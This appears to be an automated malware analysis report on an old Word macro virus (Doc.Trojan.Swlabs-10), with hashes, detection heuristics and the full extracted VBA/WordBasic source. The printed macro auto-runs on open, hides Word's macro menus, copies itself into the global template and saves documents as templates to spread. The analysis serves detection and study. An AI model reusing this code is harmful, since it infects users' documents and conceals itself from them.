Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6812aa411a519189…

MALICIOUS

Office (OLE)

Size: 28.5 KB
Created: 1998-05-11 14:49:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: e21fd525fab1cac02b8a0b4b36c25334
SHA-1: b3f8b44ed3a39896d62a8f60dd28b457683dd5a6
SHA-256: 6812aa411a519189a7c80ec561ca5949c065a1190dd742ef9ad42ed55e9ea13c
Risk Score: 188

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Swlabs-10. It contains legacy WordBasic macro markers and a VBA macro named AutoOpen. The AutoOpen macro attempts to hide the application, copy itself to the global template, and save the document as a template, indicating a propagation mechanism.

Heuristics (4)

  • ClamAV: Doc.Trojan.Swlabs-10 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Swlabs-10
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "AutoOpen"

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1785 bytes
SHA-256: c45b60d2ffd3a061450db0f21486b5aefe266f49f833b2a7a2ede6496e7c8616
Detection
ClamAV: Doc.Trojan.Swlabs-10
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Dim FName$
Dim MacName$
Rem SkamWerks Labs Presents the Bitch Concept Created by NEVERMORE

Rem Run Payload, Copy Macros to Template.
On Error GoTo -1: On Error GoTo ErrorHandler

     If WordBasic.[MenuItemText$]("&Tools", 0, 13, 0) = "&Macro..." Then
          WordBasic.ToolsCustomizeMenus Name:="FileTemplates", Menu:="&File", Context:=0, Remove:=1
          WordBasic.ToolsCustomizeMenus Name:="ToolsMacro", Menu:="&Tools", Context:=0, Remove:=1
          WordBasic.ToolsCustomizeMenus Name:="FileTemplates", Menu:="&File", Context:=0, Remove:=1, MenuType:=1
          WordBasic.ToolsCustomizeMenus Name:="ToolsMacro", Menu:="&File", Context:=0, Remove:=1, MenuType:=1
     End If

Rem Virus Payload Area.

     WordBasic.AppHide "Program Manager"
     FName$ = WordBasic.[FileName$]()
     MacName$ = FName$ + ":AutoOpen"

     If WordBasic.[MacroFileName$]("AutoOpen") = "" Then GoTo EndCode
     WordBasic.MacroCopy MacName$, "Global:AutoOpen", 1

ErrorHandler:

Rem Copy Macro(s) from Template to the Document

On Error GoTo -1: On Error GoTo AutoOpenHandler
     MacName$ = FName$ + ":AutoOpen"
     WordBasic.MacroCopy "Global:AutoOpen", MacName$, 1
AutoOpenHandler:

Rem Save Document as Template
If WordBasic.[FileName$]() <> "" Then
     WordBasic.FileSaveAs Format:=1
End If

Rem Virii Unite!eate Virus

On Error GoTo -1: On Error GoTo 0:
On Error GoTo -1: On Error GoTo EndCode:



EndCode:

End Sub